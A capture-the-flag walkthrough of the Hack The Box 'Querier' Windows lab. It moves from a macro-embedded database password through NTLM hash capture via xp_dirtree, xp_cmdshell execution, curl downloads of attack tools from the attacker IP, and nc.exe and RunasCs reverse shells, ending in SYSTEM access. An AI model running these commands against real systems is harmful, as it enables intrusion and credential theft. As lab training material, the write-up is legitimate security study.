HTB - Queier

Machine Info

Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.

Enumeration

---

Scope

IP Address: 10.10.10.125

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE      REASON
135/tcp  open  msrpc        syn-ack
139/tcp  open  netbios-ssn  syn-ack
445/tcp  open  microsoft-ds syn-ack
1433/tcp open  ms-sql-s     syn-ack
5985/tcp open  wsman        syn-ack


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ nmap -p135,139,445,1433,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-07-11T13:38:17+00:00; +7s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-11T13:34:28
|_Not valid after:  2054-07-11T13:34:28
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T13:38:13
|_  start_date: N/A
|_clock-skew: mean: 6s, deviation: 0s, median: 6s

* Open ports: 135,139,445,1433,5985
* Services: RPC - SMB - MSSQL - winRM
* Versions: Microsoft SQL Server 2017 
* Important Notes: QUERIER.HTB.LOCAL

RPC Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rpcclient -U "%" $ip

rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

SMB Enumeration

smbclient managed to get results but CME failed, The share Reports is not standard share, So let's explore it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ smbclient -N -L //$ip         

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec smb $ip -u '' -p '' --shares              

SMB         10.10.10.125    445    QUERIER          [+] HTB.LOCAL\: 
SMB         10.10.10.125    445    QUERIER          [-] Error enumerating shares: STATUS_ACCESS_DENIED

I mount the share to my kali machine to explore it easily

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ sudo mount -t cifs "\\\\$ip\\Reports" ./mount
Password for root@\\10.10.10.125\Reports: 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ ls mount          
'Currency Volume Report.xlsm'

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ file mount/Currency\ Volume\ Report.xlsm 
mount/Currency Volume Report.xlsm: Microsoft Excel 2007+

Initial Access

---

Shell as reporting

I searched online for this file extension, and I found that It's Excel file macros enabled which contain visual basic script

I searched for a tool that can extract the script from xslm file and a found this one:

InstallGitHub

The macros script simply has a connection string to connect to database and execute some SQL query

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

So, the credentials are reporting:PcwTWTHRwryjc$c6, Let's connect to mssql database

Confirm access with CME

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec mssql $ip -u reporting -p 'PcwTWTHRwryjc$c6' -d volume

MSSQL       10.10.10.125    1433   None             [*] None (name:10.10.10.125) (domain:volume)
MSSQL       10.10.10.125    1433   None             [+] volume\reporting:PcwTWTHRwryjc$c6

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ impacket-mssqlclient QUERIER/reporting:'PcwTWTHRwryjc$c6'@$ip -db volume -windows-auth

SQL (QUERIER\reporting  reporting@volume)>

I tried these credentials against other protocols RPC, SMB but it didn't authenticate me although I have valid credentials

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec smb $ip -u reporting -p 'PcwTWTHRwryjc$c6'

SMB         10.10.10.125    445    QUERIER          [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6 STATUS_NO_LOGON_SERVERS 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec winrm $ip -u reporting -p 'PcwTWTHRwryjc$c6'

HTTP        10.10.10.125    5985   QUERIER          [*] http://10.10.10.125:5985/wsman
WINRM       10.10.10.125    5985   QUERIER          [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rpcclient -U "reporting%PcwTWTHRwryjc\$c6" $ip

rpcclient $> enumdomusers
result was NT_STATUS_CONNECTION_DISCONNECTED

Shell as mssql-svc

One possible attack from mssql is to connect to remote smb server and get the hash of the service account of the database.

SQL (QUERIER\reporting  reporting@volume)> EXEC master..xp_dirtree '\\10.10.16.3\share\'

Start smb server and wait for the hash

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ impacket-smbserver -smb2support share .

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

[*] mssql-svc::QUERIER:aaaaaaaaaaaaaaaa:19a983f61b035d9c0dfecd82a3086e51:0101000000000000002bd76ddad3da01464386040bb50e2a000000000100100062006400620066006800460050005a000300100062006400620066006800460050005a0002001000710045006b00760063004a0079006f0004001000710045006b00760063004a0079006f0007000800002bd76ddad3da010600040002000000080030003000000000000000000000000030000046ff56ce98fc5308db7c4a5d9d52dc999fdd9105da31e9931733c94f2e971a8f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003300000000000000000000000000

Crack with hashcat

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt

MSSQL-SVC::QUERIER:aaaaaaaaaaaaaaaa:19a983f61b035d9c0dfecd82a3086e51:0101000000000000002bd76ddad3da01464386040bb50e2a000000000100100062006400620066006800460050005a000300100062006400620066006800460050005a0002001000710045006b00760063004a0079006f0004001000710045006b00760063004a0079006f0007000800002bd76ddad3da010600040002000000080030003000000000000000000000000030000046ff56ce98fc5308db7c4a5d9d52dc999fdd9105da31e9931733c94f2e971a8f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003300000000000000000000000000:corporate568

Session..........: hashcat
Status...........: Cracked

Authenticate with this credentials MSSQL-SVC:corporate568, I can see from CME that we have admin privileges over mssql instance

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec mssql $ip -u 'MSSQL-SVC' -p 'corporate568' -d volume

MSSQL       10.10.10.125    1433   None             [+] volume\MSSQL-SVC:corporate568 (Pwn3d!)

Connect to the database as that user

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ impacket-mssqlclient QUERIER/MSSQL-SVC:'corporate568'@$ip -windows-auth -db volume

SQL (QUERIER\mssql-svc  dbo@volume)> 

Confirm admin pivileges

SQL (QUERIER\mssql-svc  dbo@volume)> select is_srvrolemember('sysadmin')
    
-   
1 

I want to execute system command with xp_cmdshell but I need to enable it first

SQL (QUERIER\mssql-svc  dbo@volume)> EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE

[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "whoami"
output              
-----------------   
querier\mssql-svc

SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "dir C:\Users"
output                                                 
----------------------------------------------------   

 Directory of C:\Users                                 

01/29/2019  12:41 AM    <DIR>          .               
01/29/2019  12:41 AM    <DIR>          ..              
01/28/2019  11:17 PM    <DIR>          Administrator   
01/29/2019  12:42 AM    <DIR>          mssql-svc       
01/28/2019  11:17 PM    <DIR>          Public 

SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "type C:\Users\mssql-svc\Desktop\user.txt"
output                             
--------------------------------   
a113d259fb6b81c18xxxxxxxxxxxxxxxxxx

User Flag: a113d259fb6b81c18xxxxxxxxxxxxxxxxxx

---

Privilege Escalation

Path 1

The service account mssql-svc often has SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege privileges which can be used to escalate to SYSTEM account

SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "whoami /priv"
output                                                                             
--------------------------------------------------------------------------------   

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    
SeImpersonatePrivilege        Impersonate a client after authentication Enabled    
SeCreateGlobalPrivilege       Create global objects                     Enabled    
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   

• We can use RoguePotato or PrintSpoofer tools and nc.exe to execute this attack

First download them to the windows machine

SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "curl 10.10.16.3/nc.exe -o C:\Users\mssql-svc\nc.exe" 
SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "curl 10.10.16.3/PrintSpoofer.exe -o C:\Users\mssql-svc\PrintSpoofer.exe" 

Execute PrintSpoofer.exe with the following syntax and start nc listener on kali machine to receive connection back

xp_cmdshell ".\PrintSpoofer.exe -c "c:\Users\mssql-svc\nc.exe 10.10.16.25 1337 -e PowerShell""

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49680
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

42be413e54f4658662xxxxxxxxxxxxxx

Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx

Path2

Get a shell to easily explore the system for possible escalation paths

SQL (QUERIER\mssql-svc  dbo@volume)> xp_cmdshell "C:\Users\mssql-svc\nc.exe 10.10.16.3 443 -e PowerShell"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49681

PS C:\Windows\system32>

Download PowerUp.ps1 which search for misconfigurations and weaknesses on the system

PS C:\Users\mssql-svc> curl 10.10.16.3/PowerUp.ps1 -o .\PowerUp.ps1

PS C:\Users\mssql-svc> . .\PowerUp.ps1
PS C:\Users\mssql-svc> Invoke-AllChecks

<snip>
Changed   : {2019-01-28 23:12:48}                 
UserNames : {Administrator}            
NewName   : [BLANK]                                       
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml                                       
Check     : Cached GPP Files
<snip>

I downloaded RunasCs.exe tool to get a shell with another user - administrator - in my case

PS C:\Users\mssql-svc> curl 10.10.16.3/RunasCs.exe -o .\RunasCs.exe

PS C:\Users\mssql-svc> .\RunasCs.exe administrator 'MyUnclesAreMarioAndLuigi!!1!' powershell -r 10.10.16.3:1337

And get a shell as admin :)

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt

42be413e54f4658662xxxxxxxxxxxxxx

Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx